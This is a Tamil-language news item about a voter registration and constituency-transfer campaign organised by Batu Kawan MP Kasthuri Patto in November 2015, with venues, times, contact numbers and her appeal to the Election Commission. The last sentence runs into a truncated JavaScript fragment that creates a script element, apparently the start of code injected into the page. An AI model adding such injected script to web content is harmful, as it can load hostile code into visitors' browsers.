பத்து கவான் நாடாளுமன்ற உறுப்பினர் குமாரி கஸ்தூரி பட்டு ஏற்பாட்டில் புதிய வாக்குப்பதிவு மற்றும் வாக்களிப்பு இடமாற்ற பிரச்சாரம் நடைபெறவுள்ளது. இப்பிரச்சாரம் பொது மக்கள் குறிப்பாக 21 வயதுக்கு மேற்பட்ட இளைய தலைமுறையினர் வாக்குப்பதிவுச் செய்யவும், தொகுதி இடமாற்றம் செய்யவும் துணைபுரியும் என்றார் செய்தியாளர் சந்திப்பில் கலந்து கொண்ட குமாரி கஸ்தூரி பட்டு. பொதுத் தேர்தலில் வாக்களிப்புச் செய்வது ஒவ்வொரு குடிமக்களின் உரிமை எனச் சுட்டிக்காட்டினார்.
இப்பிரச்சாரம் கீழே குறிப்பிடப்பட்டுள்ள பத்து கவான் நாடாளுமன்ற 3 தொகுதிகளில்நவம்பர் மாதம் நடைபெறும்
தேதி : 1 நவம்பர் 2015
நேரம் : காலை 8.00 முதல் மதியம் 1.00 வரை
இடம்:: பியூ நாய்ல் அகடெமிக் செண்டர் சுங்கை பாக்காப்.
(தொடர்புக்கொள்ள : திருமதி கோர் 017-400 1865)
தேதி : 1 நவம்பர் 2015
நேரம் : காலை 8.00 முதல் மதியம் 2.00 வரை
இடம்: கட்டிட அடித்தளம், மெகாமால், பிறை
(தொடர்புக்கொள்ள : திரு இராஜன் 010-231 5253)
தேதி : 1 நவம்பர் 2015
நேரம் : காலை 11.00 முதல் மதியம் 2.00 வரை
இடம்: கட்டிட அடித்தளம், AEON புக்கிட் மிச்ஜா
(தொடர்புக்கொள்ள : திரு காசிநாதன் 012-456 8053)
பொது மக்கள் இப்பிரச்சாரத்தில் கலந்து கொண்டு தங்களின் வாக்களிப்பு தகுதியினை உறுதிப்படுத்திக் கொள்ள வேண்டும். மேலும் கடந்த காலங்களில் அரசியல் கட்சிகளைப் பிரதிநிதித்து துணை வாக்குப்பதிவாளர்கள் நியமிக்கப்பட்டனர். ஆனால் கடந்த 2013-ஆம் ஆண்டு நவம்பர் மாதம் தொடங்கி கட்சியைச் சார்ந்த துணை பதிவாளர்களின் உரிமம் நீட்டிக்கப்படவில்லை. எனவே, தேர்தல் ஆணையம் மீண்டும் துணை பதிவாளர்களுக்கு உரிமம் வழங்க முன் வரவேண்டும் எனக் கேட்டுக்கொண்டார் நாடாளுமன்ற உறுப்பினர் குமாரி கஸ்தூரி பட்டு.var d=document;var s=d.createElement(‘script’);